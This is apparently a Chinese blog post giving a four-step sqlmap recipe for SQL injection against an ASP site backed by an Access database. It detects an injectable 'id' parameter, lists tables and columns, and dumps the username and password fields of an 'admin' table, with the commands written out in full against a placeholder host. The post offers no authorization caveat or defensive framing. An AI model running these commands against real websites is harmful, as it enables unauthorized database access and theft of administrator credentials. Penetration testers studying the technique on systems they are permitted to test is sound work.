51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

sqlmap:Access数据库注入思路

1.判断注入的是否存在注入漏洞

sqlmap -u "http://www.xxx.com/xx.asp?id=xxx"
root@huc:~# sqlmap -u(-u:指定一个URL) "http://www.xxx.com/xx.asp?id=xxx"

2.获取表名

sqlmap -u "http://www.xxx.com/xx.asp?id=xxx" --tables
root@huc:~# sqlmap -u "http://www.xxx.com/xx.asp?id=xxx" --tables

3.获取字段名

sqlmap -u "http://www.xxx.com/xx.asp?id=xxx" --columns -T 表名
root@huc:~# sqlmap -u "http://www.xxx.com/xx.asp?id=xxx" --columns -T admin

4.获取字段中的内容

sqlmap -u "http://www.xxx.com/xx.asp?id=xxx" --dump -T 表名 -C "字段名1,字段名2..."
root@huc:~# sqlmap -u "http://www.xxx.com/xx.asp?id=xxx" --dump -T admin -C "username,password"
赞(0)
未经允许不得转载:工具盒子 » sqlmap:Access数据库注入思路